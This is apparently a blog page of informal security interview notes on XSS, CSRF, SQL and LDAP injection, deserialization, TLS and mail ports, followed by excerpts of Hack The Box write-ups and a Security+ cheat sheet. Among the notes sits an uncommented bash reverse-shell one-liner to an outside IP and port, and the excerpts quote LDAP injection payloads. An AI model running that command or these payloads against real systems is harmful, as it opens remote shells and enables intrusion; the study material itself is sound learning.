interview


do u know any attacks? and the mitigation?

XSS
persistent XSS: upload malicious code in the database, like the comment box or profile. 
reflected XSS: send a URI with malicious script to the victim
Dom-based XSS: change the element of the DOM, it happend at the browser, the client 
mitigation: CSP, filter or encode the special characters, 
when the XSS has been executed, we can also set http-only to avoid cookie being stolen 

phishing: spoofing an email or message or dicrect users to enter personal information at  fake website.
mitigation: firewall, update the latest browser, use google or other trust-worthy browser. install antivirus software.

CSRF: make the victim to submit a crafeted web request. forge a URI , crafted image tags, hidden forms, and JavaScript XMLHttpRequests. 
mitigation: CSRF token, check the referer to ensure the source website. 

Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

file upload:Upload the executable file by the user, and it can be access and execute. change the suffix,Editing the POST request to change the MIME type of the PHP file to make it seem like it is an image.
mitigation:  change the name of the uploaded file, make sure the upload directory does not have executable permissions.Check the uploaded file has the correct filetype.

SQL injection: insert malicious SQL statements an entry field for execution 
mitigation: filter the special characters .send the queries directly to the database is not secure. You should always be using prepared statements to pass queries to the database.

code injection:

buffer overflow: triggered by malformed inputs; overwrites adjacent data or executable code, this may result in erratic program behavior, including memory access errors, incorrect results, and crashes.
ASLR

deserilization: 
convert the user input to the object and get excuted。
like in python, theres is a library pickle,  When we leverage 'pickle.load', it changes the serialized object completely during serialization because of '__reduce__'. As we know, when we serialize an object, the spacial method like '__init__' will be automatically executed. 

mitigation: change other secure API。 like  '__getnewargs()', '__getstate__()' and '__setstate__()' instead.

linux port check: lsof -i netstat
process check : ps 
analyse log: trafic
/bin/bash  -i >& /dev/tcp/103.50.253.190/4444 0>&1

TCP/UDP difference

trouble shoot if you cannot reach google.com
ping, traceout, check the wireshark.

VPN and http encryption algorithm, how it works? 
ssl. Client sends hello to the server, and the server send the certificate to the client.  the certificate will be checked by the third party, and the server will check the authority of the user. 
how they negotiate with the session key?
  1. Client & server generate each a random value and send to each other
  2. Server sends the public key to the client
  3. The client generates a value called "pre-master secret" using both random values, and encrypts it using server's key, then sends it to the server
  4. Now both client and server have each other's random values and "pre-master secret", so basing on this information they can both generate the same session key and start using it in encrypting the following messages.

how TCP works?
3 handshake, syn->syn+ack->ack

http header?
referer, cookie, session, expire date. URI, function, return code.


Why your computer is slow?
  • Running out of RAM (Random Access Memory)
  • Running out of disk drive space (HDD or SSD)
  • Old or fragmented hard drive
  • Too many background programs
  • Too many startup programs
  • Falling behind on Windows or driver updates
  • Malware or viruses
  • Special effects and visual features
mitigation:
Restart your computer , 
Clean your hard drive,
Empty your Recycle Bin,
Remove unwanted programs,
Clean your Downloads folder,
Scan for malware and viruses
reinstall system

When you have a website, what security problem will you consider?
limit the user input
update the software
restrict file upload
backup website


What is POP3 and which are the default POP3 ports
Post Office Protocol version 3 (POP3) is a standard mail protocol used to receive emails from a remote server to a local email client. POP3 allows you to download email messages on your local computer and read them even when you are offline. Note, that when you use POP3 to connect to your email account, messages are downloaded locally and removed from the email server. This means that if you access your account from multiple locations, that may not be the best option for you. On the other hand, if you use POP3, your messages are stored on your local computer, which reduces the space your email account uses on your web server.

By default, the POP3 protocol works on two ports:

Port 110 - this is the default POP3 non-encrypted port
Port 995 - this is the port you need to use if you want to connect using POP3 securely

What is IMAP and which are the default IMAP ports
The Internet Message Access Protocol (IMAP) is a mail protocol used for accessing email on a remote web server from a local client. IMAP and POP3 are the two most commonly used Internet mail protocols for retrieving emails. Both protocols are supported by all modern email clients and web servers.

While the POP3 protocol assumes that your email is being accessed only from one application, IMAP allows simultaneous access by multiple clients. This is why IMAP is more suitable for you if you're going to access your email from different locations or if your messages are managed by multiple users.

By default, the IMAP protocol works on two ports:

Port 143 - this is the default IMAP non-encrypted port
Port 993 - this is the port you need to use if you want to connect using IMAP securely

What is SMTP and which are the default SMTP ports
Simple Mail Transfer Protocol (SMTP) is the standard protocol for sending emails across the Internet.

By default, the SMTP protocol works on three ports:

Port 25 - this is the default SMTP non-encrypted port
Port 2525 - this port is opened on all SiteGround servers in case port 25 is filtered (by your ISP for example) and you want to send non-encrypted emails with SMTP
Port 465 - this is the port used if you want to send messages using SMTP securely



Popular posts from this blog

Phonebook - Hack the box Write up -- Web LDAP injection

Image
 0x00 Problem  0x01 Check the vulnerability When we see the login form on the website, it might be command injection, SQL injection, LDAP injection.  We can see that this need us to login with workstation username, it might be LDAP injection. 0x02 LDAP injection payload Here is the basic LDAP injection payload. We can check the vulnerability. user=*)(& password=*)(& --> (&(user=*)(&)(password=*)(&))  After we type it, we found the response shows successful, and return a page has search box. Then we type a character in the search box, and it returns some user phonebook information. I tried 'flag', 'HTB', it doesn't find any results. Then we try to find user 'Reese', but the information doesn't look like flag.   0x03 Locate the flag  Then we change our payload to check if the password is the flag. user=Reese password=HTB*)(& --> (&(user=Reese)(password=HTB*)(&  It can also return to the search page which means it...
Read more

wafwaf -- Hack The Box -- Web SQL injection

Image
0x00 Problem 0x01 Check the Source Code We open the website and only see the source code on the website. As we can see, there is a WAF will filter some characters and words, that means the normal injection will not work. However, we can see, there is a json_decode() function will decode JSON data, that means the data can be accepted should be JSON format.  The example JSON format data is like: /u0074, /u0075. In addition, there is a "php://input",  accesses the read-only stream of the requested raw data, executing the data in the post request as PHP code. 0x02 Local Test We can launch an Apache server to test it. I copy the source code and make a little change to test this. This file is in /var/www/html. We will construct the data first. This time I use 'select' as an example. The word transfer to ASCII, then to hex, then replace the '\0x' as '\u00'. This can be test in the browser console. At the end, we can test it with curl . As we can see, the SQL...
Read more

Cheat sheet for security+

Image
Malware virus: need people action to execute and spread. Hoax: trick the victim to infect, like game. worms: spread and execute without humman  trojans: can get remote control. RAT(remote access Trojan) ransomware: take control of your computer system, pay for unlock, most time will not unlock if you pay spyware: audit the callender, website history and other actions. rootkit: a type of backdoor, software design to administrative level control or root priviledge without detection. use DLL injection. malicious code inserted into a running process or kernel-mode device drvier. intercept calls and redirect to the malicous code. spam: CAN-Spam Act law to stop relaying send out email through other's mail server. Spim(instant message) like chat, text message.
Read more